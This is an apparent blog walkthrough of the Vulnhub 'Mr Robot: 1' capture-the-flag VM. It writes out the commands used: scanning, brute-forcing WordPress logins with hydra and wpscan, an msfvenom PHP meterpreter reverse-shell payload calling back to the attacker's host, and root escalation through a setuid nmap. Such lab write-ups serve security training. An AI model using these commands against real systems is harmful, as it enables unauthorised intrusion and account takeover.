Vulnhub - Mr Robot: 1 boot2root CTF walkthrough

  2017-02-25


Introduction

Find the three flags that are hidden in the vm.

Flag 1

To begin the fun let’s run netdiscover to identify the target system.

Identify the right target

There it is, waiting at 10.0.2.7. The next step obviously is to run a quick nmap scan.

nmap -sS -p- 10.0.2.7 -v --open -oA target_$(date "+%Y-%m-%d") -sC -sV
Nmap scan results.

Run a file brute-force on the webserver.

gobuster -u http://10.0.2.7 -w /usr/share/seclists/Discovery/Web_Content/raft-medium-files.txt -e -r -l
The results of the directory brute-force attack.

While gobuster is running and the results are coming in, let’s just take a look at the website and the robots.txt.

User-agent: *
fsocity.dic
key-1-of-3.txt

Voila, there is the first key.

Flag 1

Flag 2

Next, we run wpscan examine the wordpress installation.

wpscan --enumerate --threads 20 --batch --log --url http://10.0.2.7

Unfortunately, wpscan did not yield any obvious pointers to exploit the wordpress installation. Furthermore, the tool was not able enumerate any users that might have a valid login.

Let’s take another look at the discoveries so far. The fsocity.dic file might provide some pointers or provide input for a brute-force attack.

# wc -l fsocity.dic
858160 fsocity.dic
# sort -u fsocity.dic | wc -l
11451

Refreshing my knowledge about wordpress, the problem with username disclosure at the login seemed to provide a starting point.

User enumeration vulnerability.

With the fsocity.dic and hydra we might be able to brute-force a valid login name. To do this, we simply set the password to some bogus value and adjust the pattern for an invalid login to “Invalid username”.

hydra -L fsocity_sorted.dic -p test 10.0.2.7 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.0.2.7%2Fwp-admin%2F&testcookie=1:Invalid username" -t 50 -f -V
Valid login names.

Awesome, and quite obvious that this is the username! With a valid login name the next step is to brute-force the password for the user “elliot”. Let’s switch back to wpscan for this task.

wpscan --log --batch --url 10.0.2.7 --wordlist ${PWD}/fsocity_sorted.dic --username elliot --threads 20
Valid login account found!

The login credentials give us administrative access to the wordpress installation. So, the next step is to gain a shell on the underlying server. This can easily be done by adding our own php code to one of the templates.

First, let’s create a metasploit payload that connects back to us.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.2.8 LPORT=4444 -f raw -o meterpreter.php

After the reverse meterpreter session has been established, let’s take a look at the home directories. There is a user robot with the second flag file. Unfortunately, we do not have the right access rights, but in the same folder is a password hash for the user that we might be able to crack.

The meterpreter reverse shell has connected and we have access to the system

A quick search on google yields the result for the MD5 hash.

MD5(abcdefghijklmnopqrstuvwxyz) = c3fcd3d76192e4007dfb496cca67e13b

To get a proper shell, let’s switch back to the meterpreter session and open a shell. An interactive version can be started via the following command.

python -c 'import pty; pty.spawn("/bin/bash")'

Then we simply login with the robot user and the discovered password. This give access to the key file.

We have access to the second file!

Flag 3

After searching the server only the root user’s home directory is left. To access this folder we somehow need to gain root on the system. The kernel is fairly old and might be vulnerable to an exploit.

An old kernel version!

Searchsploit ftw.

One vulnerability found for the kernel!

Also, the exploit suggester might provide additional pointers.

There exists another vulnerability with a metasploit module.

Both exploits do not work on the target system. The suggested kernel exploit overlayfs_priv_esc is applicable to the kernel according to the exploit module. The netfilter_priv_esc_ipv4 is not compatible with the old linux version.

So there has to be some way to gain root on the server. Let’s search for setuid files that might be exploitable.

find / -perm +6000 2> /dev/null
A local installation of nmap.

There is nmap installed on the system and the version 3.81 is pretty old. In these old days, there was an interactive shell that could be utilized to gain root on the system. Seems like we have a winner! This version of nmap has that option enabled.

The third and final flog.

Links